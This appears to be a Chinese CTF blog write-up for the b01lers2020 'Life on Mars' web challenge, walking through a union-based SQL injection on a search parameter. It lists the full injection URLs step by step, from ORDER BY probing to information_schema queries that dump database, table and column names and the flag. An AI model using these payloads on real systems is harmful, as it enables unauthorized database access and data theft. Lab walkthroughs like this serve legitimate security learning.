[b01lers2020]Life on Mars1

打开靶场

[b01lers2020]Life on Mars1_第1张图片

[b01lers2020]Life on Mars1_第2张图片

 直接bp抓包

[b01lers2020]Life on Mars1_第3张图片

多次点击左侧超链接

发现/query?search=这个参数一直在发生改变

[b01lers2020]Life on Mars1_第4张图片

可以发现它返回了json格式的数据,猜测是sql注入

 放进hackbar进行操作

[b01lers2020]Life on Mars1_第5张图片

orderby进行判断

[b01lers2020]Life on Mars1_第6张图片

http://6f5976a0-0364-4c05-a7f5-6f0c863e7e41.node4.buuoj.cn:81/query?search=amazonis_planitia order by 1,2

 后面就是sql注入一梭子

[b01lers2020]Life on Mars1_第7张图片

http://6f5976a0-0364-4c05-a7f5-6f0c863e7e41.node4.buuoj.cn:81/query?search=amazonis_planitia union select 1,2

 看到回显点,进行查询

[b01lers2020]Life on Mars1_第8张图片

 读库名

http://1a878735-1c5b-4fdf-8f5f-79759b6591a9.node4.buuoj.cn:81/query?search=olympus_mons union select 1,(SELECT group_concat(schema_name) FROM information_schema.schemata)

[b01lers2020]Life on Mars1_第9张图片

http://1a878735-1c5b-4fdf-8f5f-79759b6591a9.node4.buuoj.cn:81/query?search=olympus_mons  union select 1,(SELECT group_concat(table_name) FROM information_schema.tables  WHERE table_schema = 'alien_code')

 读列名

[b01lers2020]Life on Mars1_第10张图片

http://1a878735-1c5b-4fdf-8f5f-79759b6591a9.node4.buuoj.cn:81/query?search=olympus_mons  union select 1,(select group_concat(column_name) from information_schema.columns where table_name = 'code')

 读字段

[b01lers2020]Life on Mars1_第11张图片

http://1a878735-1c5b-4fdf-8f5f-79759b6591a9.node4.buuoj.cn:81/query?search=olympus_mons  union select 1,(select group_concat(code) from alien_code.code limit 1)

你可能感兴趣的:(ctf,buuctfweb,sql,数据库,web安全,php,网络安全)